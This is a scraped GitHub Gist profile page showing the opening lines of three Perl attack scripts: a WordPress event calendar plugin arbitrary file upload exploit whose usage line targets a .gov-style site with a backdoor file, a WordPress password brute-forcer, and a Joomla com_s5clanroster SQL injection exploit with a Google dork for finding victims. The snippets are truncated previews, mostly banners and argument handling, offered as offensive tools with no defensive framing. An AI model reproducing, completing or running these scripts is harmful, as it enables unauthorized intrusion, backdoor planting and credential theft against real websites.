Skip to content

Instantly share code, notes, and snippets.

View dreadpiratesr's full-sized avatar

niño orsino dreadpiratesr

View GitHub Profile
#!/usr/bin/perl
#EXPLOIT: http://www.exploit4arab.net/exploits/1433
use LWP::UserAgent;
use strict;
use warnings;
sub banner {
print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n";
print "[!] [ usage ]: perl $0 www.target.gov.crot backdoor.php.gif\n";
print "--------------------------------------------------------------------------------------------------------------------\n";
#!/usr/bin/perl
# WP-BRUTE BY DPR
# dreadpiratesr
use LWP::UserAgent;
$site = $ARGV[0];
$user = $ARGV[1];
$wordl = $ARGV[2];
#!/usr/bin/perl
#Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit
#Google Dork: inurl:index.php?option=com_s5clanroster&
#Vendor HomePage: http://www.joomla.org/
system("clear");
system("cls");
print "=========================================================\n";
print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n";
print "* Coded dreadpiratesr *\n";
print "* *\n";